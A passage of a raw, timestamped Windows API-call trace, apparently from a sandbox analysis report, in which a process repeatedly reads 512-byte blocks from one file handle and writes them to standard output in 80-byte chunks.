_get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.760] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.760] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.761] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.761] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.762] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.762] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.763] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.763] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.764] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.764] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.765] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.765] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.765] GetFileType (hFile=0x4c) returned 0x1 [0092.765] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.766] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.766] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.766] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.766] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] GetFileType (hFile=0x4c) returned 0x1 [0092.767] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.767] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, 